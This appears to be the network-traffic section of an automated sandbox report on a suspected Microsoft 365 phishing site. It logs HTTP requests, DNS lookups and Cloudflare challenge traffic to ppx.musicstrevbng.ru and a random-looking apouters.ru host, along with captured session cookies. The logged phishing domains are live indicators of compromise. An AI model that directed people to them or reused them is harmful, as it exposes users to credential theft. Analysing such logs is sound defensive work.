Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca4d8fcf5c334&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca4d8fcf5c334&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ppx.musicstrevbng.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ppx.musicstrevbng.ru/Ax4EM/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitvQ3pGdFR2WVhOdGMzY0NlNE5MNUE9PSIsInZhbHVlIjoiM1d1ZHdNYmRKRjl5OTZ0RG5zNXhLZFdqTHBoTHBaK0l6MzZ5TUFMQlI3YkxtTkhGZnpoaGtBNjlSUEJRcnVFTWZrTTVYOW9qMDIvRFo0Q3VocHJnMEtXWlhJSnRjL29Mc0pTek02MHVVV0FoMmNYR011TnNFMy82NXdkZWx2bysiLCJtYWMiOiJjODczNTAzZDBiNTEwZWMxMzg5NTJhOTY2OGNhZDg2ZWVmOGFmMmY2YjY3MjM2ZmMzNDhlYThjMDVjNjAzYzY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkIrSEdWZ1FQWmRYeHVHTjlHb0t3NEE9PSIsInZhbHVlIjoia0dWUHMyQmo3ZERQMTZVUmc4TlB4QVQ0YXVGRFZkdjlVNWZUeDZsV1RWdU1oNUk2bmwraEh5UUhsR1dKYnQ3V3JKSStXbzliWkNYZTZQUGdsWWhxZUJNWWp6QllFNkJaUjErSmYwNittcEZCdFpTcmlJcTlLZmo5YXdPSkMzaWwiLCJtYWMiOiIxNzZkNDY3NDYzMzI4YmFkMDRlODlhNWRiOGIwYjYwMWE5NmM5NmMyZjZhNjJjZjE5Yzc5MTUwOTQ3NzE1ZWExIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8feca4d8fcf5c334/1736344095999/71f33037ddeb4c17610da78161a65f15caeef44e2fdd5a060d33437a6ec55faf/cP1eZ3Z_qm1xGs0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca7eefaf042bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8feca7eefaf042bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHho HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8feca7eefaf042bb/1736344221782/d00671299b791ce228010dbde9ff40dbe716ec779dfb4c031bfbbfe8e91f0180/YC-1qhwLFuhwYEG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHho HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL HTTP/1.1Host: mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ppx.musicstrevbng.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ppx.musicstrevbng.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL HTTP/1.1Host: mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: warrior-empire.com
Source: global trafficDNS traffic detected: DNS query: ppx.musicstrevbng.ru
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3192sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59rsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:48:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CysqjPtP%2B1eWl3zHEJhJCDoXMSsdDiPXqR273IDOLvk6SCGDoOPH9b7kCPx8M129Aa5AjRjGQK16K61rSIUxTk9exKcIZlm8U09kMhkWeLv2R9LEs6tMRMjCPFlmwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10459&min_rtt=10373&rtt_var=4063&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2241&delivery_rate=261678&cwnd=234&unsent_bytes=0&cid=cdb798fd2bc07001&ts=106&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8feca4e9ed4441d8-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1686&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1903&delivery_rate=1694718&cwnd=222&unsent_bytes=0&cid=c1d7a072f36c4c41&ts=447&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:48:17 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: KTqs9m6snymxTy6s3R7QAKyU/cX3YpwHLWY=$I4vyUotujMut9tqyServer: cloudflareCF-RAY: 8feca4f26dd0428f-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:48:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 7uced0iXIOE9beOhMYO7XuFX/wx812gx2wI=$p4CQ0BQVhwIuugO7Server: cloudflareCF-RAY: 8feca500b8f40f88-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:50:23 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: x5mid4ZXJIYHCUD0k+UPLuQfynLE6MpvaWg=$fkpCZy8N0W+fOgqOcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8feca8033aec4276-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:50:25 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: eOZbP+Fsy26Pv/erQm3ABPKgXGAgghQzzWo=$4UxTLkLlzN4vlKJjServer: cloudflareCF-RAY: 8feca8144ecede9b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 13:50:39 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: +vBEVHfQYhaWCN+ngCqKgT8uCV4fQRpJHUc=$dPiQYyiIyAHaGDV0Server: cloudflareCF-RAY: 8feca8695e1dde9b-EWRalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_247.6.drString found in binary or memory: https://PPx.musicstrevbng.ru/Ax4EM/#F
Source: chromecache_226.6.dr, chromecache_215.6.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_226.6.dr, chromecache_215.6.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
